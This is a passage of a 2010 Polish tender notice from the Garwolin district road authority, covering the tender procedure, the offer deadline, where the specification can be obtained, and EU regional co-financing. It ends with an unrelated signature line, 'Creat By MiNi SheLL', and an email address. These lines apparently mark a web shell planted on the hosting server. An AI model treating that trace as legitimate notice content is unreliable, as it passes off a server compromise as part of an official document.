<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w  Garwolinie  ul. Przemysłowa 45,  08-410  Wola Rębkowska, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2010 godzina 09:30, miejsce: Powiatowy Zarząd Dróg w Garwolinie ul. Przemysłowa 45,  08-410  Wola Rębkowska, pokój nr 3  tj. sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany przy udziale środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013, Priorytet III. Regionalny System Transportowy Działanie 3.1. Infrastruktura drogowa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com